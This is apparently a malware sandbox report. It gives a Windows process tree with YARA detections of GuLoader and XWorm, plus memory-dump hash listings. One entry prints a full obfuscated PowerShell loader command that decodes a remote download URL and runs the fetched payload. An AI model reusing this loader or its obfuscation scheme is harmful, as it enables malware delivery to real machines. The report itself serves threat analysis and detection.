Date: Thu, 23 May 2024 19:08:49 GMT
Content-Type: application/octet-stream
Content-Length: 34368
Last-Modified: Fri, 17 May 2024 15:08:35 GMT
Connection: close
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Disposition: attachment;filename="mvQWivKaVtxblG80.bin"
ETag: "664772f3-8640"
Accept-Ranges: bytes



                                                                                                      Target ID:0
                                                                                                      Start time:15:08:04
                                                                                                      Start date:23/05/2024
                                                                                                      Path:C:\Windows\System32\cmd.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\xff.cmd" "
                                                                                                      Imagebase:0x7ff73b120000
                                                                                                      File size:289'792 bytes
                                                                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high
                                                                                                      Has exited:true

                                                                                                      Target ID:1
                                                                                                      Start time:15:08:04
                                                                                                      Start date:23/05/2024
                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                      Imagebase:0x7ff620390000
                                                                                                      File size:862'208 bytes
                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high
                                                                                                      Has exited:true

                                                                                                      Target ID:3
                                                                                                      Start time:15:08:04
                                                                                                      Start date:23/05/2024
                                                                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:powershell.exe -windowstyle hidden "$Shave = 1;$Stikningens='Sub';$Stikningens+='strin';$Stikningens+='g';Function Sideblikkets($Missel){$Wandoo=$Missel.Length-$Shave;For($Unisexuality=5;$Unisexuality -lt $Wandoo;$Unisexuality+=6){$Berseems+=$Missel.$Stikningens.Invoke( $Unisexuality, $Shave);}$Berseems;}function Mekhitarist($Starchflower){& ($Plukningernes) ($Starchflower);}$Skolekommissionerne=Sideblikkets 'kedelMSepteoAk dezHund.iLivsflAesculBloksaCo ds/ Call5pred,.Tizwi0Liebh P ery(MaalbW.ormaiReklanSonnedNdst.oUneffwNonadsBen.i Obs rNSt.anTApert D cum1Zolao0Sel.k.Raad 0Impen;Blodh N,nclW.aldyiT lelnDagui6Midal4Cicer;genne S.llex ype6 C,ys4 Ord ;Paras ,attr Seigv Trem:a pro1 Dubh2Varme1 Glan.Skand0 Cucu)skatt F adrGUndere OuttcP,litkLandooAspa / Benb2 Genf0Outfi1Crim.0Af.an0Amphi1Warri0Theca1 Komm BosomFUrovaiFar,brBoateeVoco.fAralkoFacadxFysio/ Jess1marke2Ta.sh1Miili. Rang0Store ';$Forvaltningsmyndigheden=Sideblikkets 'Eksp USkr,bslucinePrel,rSkakt-YoghuAP pelgFilt.e haln Endet aks, ';$Disgustful=Sideblikkets ' hedhOverntrothet Ind.p DeacsBlued:Speac/U,clo/ TraswPseudwDaanewProca.Dissis Ras.eStjernPrededRednisTemaspD.fraaIndrec Helle A st.Acentcthorao draem Fed,/Statip,illbrnrbeso A.oc/ExactdBistnl Club/Postuo utscwNiger9fuldf1Stoic4Bisto8Bikag ';$Fangstkvotaer=Sideblikkets 're te> Laur ';$Plukningernes=Sideblikkets 'Sa,spiTapiseHell.xkomma ';$Fertilizables='Indkapslingerne140';$Koden = Sideblikkets ' P gleDtsilc.msvbh S eeo Ex.u digit%Supe,alevi p .erjpStrumdBe ikaStridtDat.taStand%Prokl\BoligTUlykki ForydFaxeheStor,rKokko. 
P,stDSaturrSoutre over S,ilo&Desig&Rang Kon re Ty.ec ModehSupinoFre e NadintLindi ';Mekhitarist (Sideblikkets 'Machi$ParengFrokolNage oBes.obFormuaKommul Syll:AktioMCloseiForfrsBrig tDonkeeSteg,rGaleo=Falsi(Gan.hcMislam,elatd Trid Busse/,iscocKomme nonsu$UnchaK PileoDoigtdYojane DistnTripl),rrit ');Mekhitarist (Sideblikkets 'Adres$nonbrg TilslStillo TongbHavneaHerrelProle:PinctDFaseraV,sicgIn,ulu haboe LapnrradiorLae,eeJalteoTubert DrifySandwp,nfori LeareStalkn,pildsProbl=Trekv$ZoogeD UmbriF,ftes InspgFlaxwuNon,psMuscatBo,caf dumpuF.renlOrnit.Ra.posPreprpS riel P.opiJerbot Nece(Cauli$Micr,FUnpr.aFr,ngnL,berg Af,us ungst Sk,lk Sph.vSte eoHaanltS,antaKrepeeRyaerrFo,mu),ehan ');$Disgustful=$Daguerreotypiens[0];$Unsingularness= (Sideblikkets 'Dugou$ rosegGreenlPr.yeoCoxswb Nesha HofmlNonbu: Bjf.BKoordesubs,b L.mpu UnkndS.ggeeNyserrBe.senEm greEvn,nsMinds=flaadNHjerte UnslwDoubt- WhitORonkebfunktj,enopeSpo.vcDokumtHym n tilgS FantySmagls yruptFougueKlampmTottl.sondeNDecigeK jsetpaleb.ChlamWFla,keThronbKrofoCPuls,lgordiiglauceBehovnTandbt');$Unsingularness+=$Mister[1];Mekhitarist ($Unsingularness);Mekhitarist (Sideblikkets 'Neg,e$RadioB,ndule HjembIntrauS.cerdNonpeeKabelrBrugen T,leeunhe.sCeteo. 
,omiH RegneSk rpaHelvedGa ewe UdstrSupersBomae[Bletr$sandsFSlaveoDummerVentovBr ebakalfalSkulktAbsolnDesilif,rhanSopragAktiesKl mam Mic.yPe,ronIndi d P,gui fy.ig ,avnhPals,eSkaded Ich.eDaudinKonsu]Wor,h=malap$.emasSTnneskschoooBu,ealSporteHydrak rozeoMa esmOrl,gmNaplei Pa ksAt,rissaucei Rea oSamfunDeprieNo purOpsprnPreceeKlang ');$Bortfjernelsernes=Sideblikkets 'Frems$PensiBLivvaeSa,rabUoveruAlexadAfreteAlimerBjrndnU.odieSvmmes iala.Is.spDForfroBortvw KoolnServilEntreoTelefa,uperdFantoFWillyiSemisl,eroleEng.n(Minid$VelgeDHoldoiTurf s.imssgK shkuEpiscs ,esktIndfdfHealtu AarelCoyot, Bomb$ ProdRAgg.eePostulTydnia Imprt NajaiSpir,v nmarp.ignar TricoLu acn S shoparthmSu areTilban ZincePassir frgenErudieSogne) Akkr ';$Relativpronomenerne=$Mister[0];Mekhitarist (Sideblikkets 'Unrig$KoopegMelanl S,dboDanmabFiskeaSyndflCurcu:DejkrV nobeaTransl Speae B rtr Un,giAer.taHaw nn AfhraCitedtKn.aseVarie=Sha,f(overtTMa.neeFedtesDyrevtK.nsp-familPCoenzaBlgeft P.eehSemit Sej s$ XiphR DavyeGrowsl.ntriadecret Herlia ousvdip op Tegnr.etsbo Be en Skalo SagkmCottoe Elefn KonseEdriar Me.knBaubeeTopno) Tefe ');while (!$Valerianate) {Mekhitarist (Sideblikkets 'Mondr$ DuctgPulisl remgoFo,elbForfoaInf.rlCellm: orchLlufteoHensllKnsroi DetauAguismStn n=Modif$Derm,tSentar ejenuSh,uce.rein ') ;Mekhitarist $Bortfjernelsernes;Mekhitarist (Sideblikkets 'StridSFre.ntInhauaDisd.rPaleot Demi-OversSForsklGenneeTickleSla tp,riva B anc4Sub,r ');Mekhitarist (Sideblikkets 'mu.pi$Genneg,haprl M,tooImmunb AmylaGarvll Sti :MasseVPote.aMad elFordreTommyrBlid,iChalcaSt ejnHyleraTalertpho oe Unco=Visko(BecloTForuneVampisHj rnt Igno-DatisPMindeaCharlt emilhRejsh Tildi$HystrRJosepeT,aumlUdkigaNemictSammeiTangfvrekompInterrExtraoFla.bnGeneroSamstmAnapheFrekvnSy doeCap.irTu.slnRottee Gast)Acido ') ;Mekhitarist (Sideblikkets ' Ofr.$SudatgPiro lFucoxoyver,bCl.staSkovflNone,:ColliHSombruam itgDrbeloUfornrBeridmOve,penontrbNuncgiun urdEnsom=Attr $MoplagMandil PicroStvb,bFiltraLi.uelMine.:RheinN 
MaalaSpondeParreg.ickeaAerodiFoin tJewel+Fa.se+Tirre% Tarv$ProcoDdigekaD,nebg O eruSupereRe.harAwakerKursneIllegoFolketI lomyacutip Tro iHoroueMor.in Bisms Repr.Erhvec DismoUniveu Persn ambrtsilic ') ;$Disgustful=$Daguerreotypiens[$Hugormebid];}$Uncoincident=320251;$Vasiferous=29255;Mekhitarist (Sideblikkets 'Amphi$tryl g GlislRykkeoshallbPyromaAcrosl ,oui:Kumm.gPremuaOejnelHelgevforn aDi,cinCrippoFormit TaleaAggrecSplint unicijodl.c Ove. Taell=Ukamp TildaGTrompeChequtFrogg- ofllC InhaoPrebanKl,nktFrsteeSubminSaddltBlok. Wahim$ FlodRCoodle RikolPol,pa TvebtBliveigruppv Dyrep slamrUdvekoIteminTro.boOakykmChicaeSpecin TugteAppl,rBast.nAlloeeProvo ');Mekhitarist (Sideblikkets 'Bantu$TilingJocunlAnthro Mu kb udv.a KimblEncy :UdbydCTransoSab.enHomagv ShinoBaldulSmeltvRideeuChirol AnaluA,utisObli.e AxilsTrele6 Spid2Fo,la Reasc=Tortu Sekle[ PinaSHoiseyA,falsPyntetFu nee F.rhmV,cef.IndenCAryepoVi sen HavavBrneae Opfyr luertNonau]Grout:Udlic:B,rkeF kinrs ltyo FyrtmFa.veBMagniadyrtisTaurie Chon6 Natu4Che,aSKonjetkluntrE.bedi Plagn ortg Linj(aabne$VitelgTimefa undelStyrmvA.beja.ogren .issoHellit,ebetaLyv.ncM,wkitTiptiil tercCemen) M rq ');Mekhitarist (Sideblikkets 'Frank$Ac,uigOntoglOsculoReelab S lpaUnimpl anti: BrisV vantaSkrivl Tal m,xheauSaveneSu ornOrlan mili=Vintn Malo.[digreS SoppyEnkelsDefi.tTentie WheamPreco.SeksuTPi.ete krivxNavletTalel.TilsmE Minin AlkechovedoDism,d rskoiElencnZygodgUnsca]Gri,g:Gaull:JenhuA ForhSP insCFo.egIkd ndIGenga.,hitfG remteGenertBrndsS KomptLech rAlkaiiKadjanSnabeg Foto( Swip$Nu,woC.laneoHail.nSlikpvLusk oTrolll,trudvBjer,uTaplilSysteuFremrsSnogeeLoka,sInter6Misch2Remrk)Multi ');Mekhitarist (Sideblikkets 'Supe.$Be.aegUnusalCh.kkoSelvobHypnoaGy nolRadic:Tokr,BOver oMah gtKleastAzod,oRhythmHeterlFossieAbbots SyllsDamagnHalakePermusAandes Tibe=Opdal$Dyr mVBroaca,oubllBage m El,kuSemiveGrandnHi le.Aut,ts Ka ruNonfobAerolsMemortSy,edrPeabei VejsnNeepags,lvf(Utilb$InterURottinIncapcSkurkoK.rrei ArthnGilenc MacriG nebd Snu 
el.quanTunfitAdopt,Flane$CoevaVPrer,aSvangs TrusiRidgef UdsoeSha lrso,thoAlemauPre asDesta)Kursn ');Mekhitarist $Bottomlessness;"
                                                                                                      Imagebase:0x7ff7b2bb0000
                                                                                                      File size:452'608 bytes
                                                                                                      MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Yara matches:
                                                                                                      • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000003.00000002.1879512931.000002AD51831000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      Reputation:high
                                                                                                      Has exited:true

                                                                                                      Target ID:4
                                                                                                      Start time:15:08:04
                                                                                                      Start date:23/05/2024
                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                      Imagebase:0x7ff620390000
                                                                                                      File size:862'208 bytes
                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high
                                                                                                      Has exited:true

                                                                                                      Target ID:5
                                                                                                      Start time:15:08:06
                                                                                                      Start date:23/05/2024
                                                                                                      Path:C:\Windows\System32\cmd.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Tider.Dre && echo t"
                                                                                                      Imagebase:0x7ff73b120000
                                                                                                      File size:289'792 bytes
                                                                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high
                                                                                                      Has exited:true

                                                                                                      Target ID:12
                                                                                                      Start time:15:08:14
                                                                                                      Start date:23/05/2024
                                                                                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" [obfuscated PowerShell script argument]
                                                                                                      Imagebase:0xf20000
                                                                                                      File size:433'152 bytes
                                                                                                      MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Yara matches:
                                                                                                      • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 0000000C.00000002.1682604695.00000000080A0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 0000000C.00000002.1672297363.0000000005654000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 0000000C.00000002.1682745414.000000000A8FD000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      Reputation:high
                                                                                                      Has exited:true

                                                                                                      Target ID:13
                                                                                                      Start time:15:08:15
                                                                                                      Start date:23/05/2024
                                                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Tider.Dre && echo t"
                                                                                                      Imagebase:0xd70000
                                                                                                      File size:236'544 bytes
                                                                                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high
                                                                                                      Has exited:true

                                                                                                      Target ID:15
                                                                                                      Start time:15:08:36
                                                                                                      Start date:23/05/2024
                                                                                                      Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:"C:\Program Files (x86)\windows mail\wab.exe"
                                                                                                      Imagebase:0xac0000
                                                                                                      File size:516'608 bytes
                                                                                                      MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Yara matches:
                                                                                                      • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 0000000F.00000002.3135063808.0000000023051000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      Reputation:moderate
                                                                                                      Has exited:true

                                                                                                      Target ID:23
                                                                                                      Start time:15:11:04
                                                                                                      Start date:23/05/2024
                                                                                                      Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 8172 -s 2772
                                                                                                      Imagebase:0x530000
                                                                                                      File size:483'680 bytes
                                                                                                      MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high
                                                                                                      Has exited:true

                                                                                                        • Opcode ID: 37f70455bdbf53fcd7f3889e41d343ca0559d2b7635257a859b65072dc8dcf33
                                                                                                        • Instruction ID: bc207c3041990c72a6b0db7cd57b104a6fcb70bd8ccc24e633f768ae22ac23f4
                                                                                                        • Opcode Fuzzy Hash: 37f70455bdbf53fcd7f3889e41d343ca0559d2b7635257a859b65072dc8dcf33
                                                                                                        • Instruction Fuzzy Hash: D9B15D70E00219CFDF14CFA9C8857EEBBF2BF88714F158129E815A7294EB749946CB81
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.1668861808.0000000000C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C40000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_c40000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 293cb1418216fea2911fe9f48cce15600828f521391c6de58b684c3b3e1509d7
                                                                                                        • Instruction ID: c99219f5528c2f9fde7e0e59e4327d82de9ab60956290a54fed1307b7cc4c30b
                                                                                                        • Opcode Fuzzy Hash: 293cb1418216fea2911fe9f48cce15600828f521391c6de58b684c3b3e1509d7
                                                                                                        • Instruction Fuzzy Hash: 41B14D70E002198FDF14CFA9D8817AEBBF2BF88314F24853DD815A7294EB749946CB81
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.1676301433.0000000006E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E30000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_6e30000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: (fl$(fl$(fl$(fl$(fl$(fl$(fl$(fl$84l$84l
                                                                                                        • API String ID: 0-252953923
                                                                                                        • Opcode ID: 0a1b9899de3fdc3a6764fff9d38d1919f16ae8cc4ae6c138e3155f909d004092
                                                                                                        • Instruction ID: 10a9f36d777050682b0bd6615db20213d62f62a410f239f722e19a200752a38a
                                                                                                        • Opcode Fuzzy Hash: 0a1b9899de3fdc3a6764fff9d38d1919f16ae8cc4ae6c138e3155f909d004092
                                                                                                        • Instruction Fuzzy Hash: 33827C74B00324DFD764DB94C549AAAB7F2AF85305F24D069D906AF395CB72EC42CB81
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.1676301433.0000000006E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E30000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_6e30000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: (fl$(fl$(fl
                                                                                                        • API String ID: 0-3144609269
                                                                                                        • Opcode ID: 18254739ba46b495823437e994fc1a83fceab387ee8442173e4e01c1fd16e408
                                                                                                        • Instruction ID: 19622c42b6741a82b81859cd126218f1d6e70d0105f44692a2aa0c00e4b4babf
                                                                                                        • Opcode Fuzzy Hash: 18254739ba46b495823437e994fc1a83fceab387ee8442173e4e01c1fd16e408
                                                                                                        • Instruction Fuzzy Hash: C4125974A00320DFD7A4CB94C549EAAB7B2AF84309F25D059E90AAF355C776EC46CB81
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.1676301433.0000000006E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E30000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_6e30000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: (fl$(fl
                                                                                                        • API String ID: 0-1194790885
                                                                                                        • Opcode ID: a8a96bc1287189cd64400836795ca84af71e915b8cd9fa8e30a20cfe8710ae3d
                                                                                                        • Instruction ID: 0b26d789e9fb0f59c12222af66b74b506c56dd74d312f9e05bce509e6aeca142
                                                                                                        • Opcode Fuzzy Hash: a8a96bc1287189cd64400836795ca84af71e915b8cd9fa8e30a20cfe8710ae3d
                                                                                                        • Instruction Fuzzy Hash: 2212C335B00325CFDBA4DB64C549BAAB7F2AF89214F24806BD905AF355DB32DC41CBA1
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.1676301433.0000000006E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E30000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_6e30000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: (fl$(fl
                                                                                                        • API String ID: 0-1194790885
                                                                                                        • Opcode ID: 554709524082ae40601b1fd283f5bb5ec0a17f989bf1a25d00dd5ff9f34d1f28
                                                                                                        • Instruction ID: 923e085840451a386cc43fe49132c5b2d3701460c8f5632f77485687339d3c27
                                                                                                        • Opcode Fuzzy Hash: 554709524082ae40601b1fd283f5bb5ec0a17f989bf1a25d00dd5ff9f34d1f28
                                                                                                        • Instruction Fuzzy Hash: 39024A74A40228CFEB64DB24C954BEEB7B2AB84304F2081E6D9096F355DB75DE81CF91
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.1676301433.0000000006E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E30000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_6e30000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: (fl$(fl
                                                                                                        • API String ID: 0-1194790885
                                                                                                        • Opcode ID: 628706d98997086919854c3ebc8d03044472023160d284de0ca19acdb826c841
                                                                                                        • Instruction ID: 3ee3bf10304ad69bf24528a334046732474bd6e528078e64758e3fb135763b7b
                                                                                                        • Opcode Fuzzy Hash: 628706d98997086919854c3ebc8d03044472023160d284de0ca19acdb826c841
                                                                                                        • Instruction Fuzzy Hash: 52F19070A00324AFEB64DB24C955FAAB7B2AF84304F20C0A5D50A6F795DB71DD82CF91
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.1676301433.0000000006E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E30000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_6e30000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: (fl$(fl
                                                                                                        • API String ID: 0-1194790885
                                                                                                        • Opcode ID: 4fec1657b31d6c86e0f3e5394ea63cc726eaf2a784bf4321a30982763d768917
                                                                                                        • Instruction ID: 69b06ee82a85d44abd51b00aa44115520cc1caf87a5641cc86c1652a9f7f2892
                                                                                                        • Opcode Fuzzy Hash: 4fec1657b31d6c86e0f3e5394ea63cc726eaf2a784bf4321a30982763d768917
                                                                                                        • Instruction Fuzzy Hash: 9391AB70B103149FEB54DB65C549BAEB7B2AF88718F209069E5066F390CB72EC41CB92
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.1676301433.0000000006E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E30000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_6e30000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: (fl
                                                                                                        • API String ID: 0-423539152
                                                                                                        • Opcode ID: 646b891cd4e91af7b901360cedfa56419182c79bf0ce7c484c751684fb525942
                                                                                                        • Instruction ID: d82ed06d493b7078a35d6e89042fe4423686613c2277147fcf845e279798fce2
                                                                                                        • Opcode Fuzzy Hash: 646b891cd4e91af7b901360cedfa56419182c79bf0ce7c484c751684fb525942
                                                                                                        • Instruction Fuzzy Hash: AA02AF74A003249FDB64DF64C849B9ABBB2AF85314F24C099E5096F355CB72ED82CF91
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.1676301433.0000000006E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E30000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_6e30000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: (fl
                                                                                                        • API String ID: 0-423539152
                                                                                                        • Opcode ID: dfc4858d2956cd160932dcbcdf2bf2225ad8545db9a2c863cd1cfcdf7d4c85b6
                                                                                                        • Instruction ID: fedf9a875d9ae751559476e4fcd1b0c48358f44f1166c4ded9bdef1fac1fa86d
                                                                                                        • Opcode Fuzzy Hash: dfc4858d2956cd160932dcbcdf2bf2225ad8545db9a2c863cd1cfcdf7d4c85b6
                                                                                                        • Instruction Fuzzy Hash: 02E17270A403289FD764EB24C959BAEB7B2AF84304F2080D5D50A6F395DB75DE81CF91
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.1676301433.0000000006E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E30000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_6e30000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: (fl
                                                                                                        • API String ID: 0-423539152
                                                                                                        • Opcode ID: 38065fd833e2ff4db351a7ff0660893e93538050ebb43f35f3c75732c4bebf5a
                                                                                                        • Instruction ID: 822dfcbbd8d5646f6cacfc29080fc896abd54ccac53588d8f98faaa45d92a64a
                                                                                                        • Opcode Fuzzy Hash: 38065fd833e2ff4db351a7ff0660893e93538050ebb43f35f3c75732c4bebf5a
                                                                                                        • Instruction Fuzzy Hash: E9815D74A00324DFDB54CF54C588AA9BBB2AF88318F25906AE905AF355C732EC42CF50
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.1676301433.0000000006E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E30000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_6e30000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 84l
                                                                                                        • API String ID: 0-1480273888
                                                                                                        • Opcode ID: 4587815a2274cbd49b57accaf22680ceda0c202d65c5c7001133c8d0396559fc
                                                                                                        • Instruction ID: 22495514498718d6f880cdfd58d757554a741ef4866b4a62c0c75ea82b4bbdc6
                                                                                                        • Opcode Fuzzy Hash: 4587815a2274cbd49b57accaf22680ceda0c202d65c5c7001133c8d0396559fc
                                                                                                        • Instruction Fuzzy Hash: 8651F530A093D49FD7528B648819E66BFB1AF47204F19C0DBE584DF293D632CC4AC7A2
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.1676301433.0000000006E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E30000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_6e30000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: cf3c9f24bcd3b6a18d08362fe850b01a74ba4998c7b524a40a725b26344b025f
                                                                                                        • Instruction ID: 6e9fedc56e895b3de2ae846e5526bd0fd4478a411becc34080422fbead284a2f
                                                                                                        • Opcode Fuzzy Hash: cf3c9f24bcd3b6a18d08362fe850b01a74ba4998c7b524a40a725b26344b025f
                                                                                                        • Instruction Fuzzy Hash: 48626D74E003249FDB64DB64C959BAEB7B2AF85304F2080A9D5096F351CB72ED82CF91
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.1676301433.0000000006E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E30000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_6e30000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 8dcac6e947f1743a8e48d500f85bdbedb1055fddee77654d21c3b58c8b733f51
                                                                                                        • Instruction ID: 0f40096a87d0a3e70f5c554c2b1a52726e5473675803d330c00d443513b4c777
                                                                                                        • Opcode Fuzzy Hash: 8dcac6e947f1743a8e48d500f85bdbedb1055fddee77654d21c3b58c8b733f51
                                                                                                        • Instruction Fuzzy Hash: 62623B70A003289FDB64DB24C955BEEB7B2AB85304F2080E5D9096F395DB75EE81CF91
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.1676301433.0000000006E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E30000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_6e30000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 46cdb0cac49aeaa776204314368b7a4f23d073b2cf6b779ea232afd533644d85
                                                                                                        • Instruction ID: 3775b13252fff666dfee656d3fd1a2bc1f73e0a14a8f13b72c466b1f8c53d865
                                                                                                        • Opcode Fuzzy Hash: 46cdb0cac49aeaa776204314368b7a4f23d073b2cf6b779ea232afd533644d85
                                                                                                        • Instruction Fuzzy Hash: 25F14B31B04325DFDBA58F35C8187AA7BB1AF81214F24C0ABD685DF252DB31CA45CBA1
                                                                                                        Memory Dump Source
